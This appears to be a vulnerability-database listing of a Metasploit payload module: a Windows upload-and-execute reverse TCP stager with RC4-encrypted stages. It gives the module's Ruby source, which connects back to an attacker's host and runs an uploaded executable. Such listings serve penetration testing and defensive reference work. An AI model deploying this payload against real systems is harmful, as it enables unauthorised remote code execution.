Lucene search

K
metasploitVlad902 <[email protected]>, sf <[email protected]>, hdm <[email protected]>, skape <[email protected]>, mihi, RageLtManMSF:PAYLOAD-WINDOWS-UPEXEC-REVERSE_TCP_RC4-
HistoryDec 31, 2012 - 9:33 p.m.

Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption, Metasm)

2012-12-3121:33:30
vlad902 <[email protected]>, sf <[email protected]>, hdm <[email protected]>, skape <[email protected]>, mihi, RageLtMan
www.rapid7.com
9

Uploads an executable and runs it (staged). Connect back to the attacker

# -*- coding: binary -*-
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

module MetasploitModule

  CachedSize = 413

  include Msf::Payload::Stager
  include Msf::Payload::Windows::ReverseTcpRc4

  def self.handler_type_alias
    "reverse_tcp_rc4"
  end

  def initialize(info = {})
    super(merge_info(info,
      'Name'          => 'Reverse TCP Stager (RC4 Stage Encryption, Metasm)',
      'Description'   => 'Connect back to the attacker',
      'Author'        => ['hdm', 'skape', 'sf', 'mihi', 'RageLtMan'],
      'License'       => MSF_LICENSE,
      'Platform'      => 'win',
      'Arch'          => ARCH_X86,
      'Handler'       => Msf::Handler::ReverseTcp,
      'Convention'    => 'sockedi',
      'Stager'        => { 'RequiresMidstager' => false }
      ))
  end
end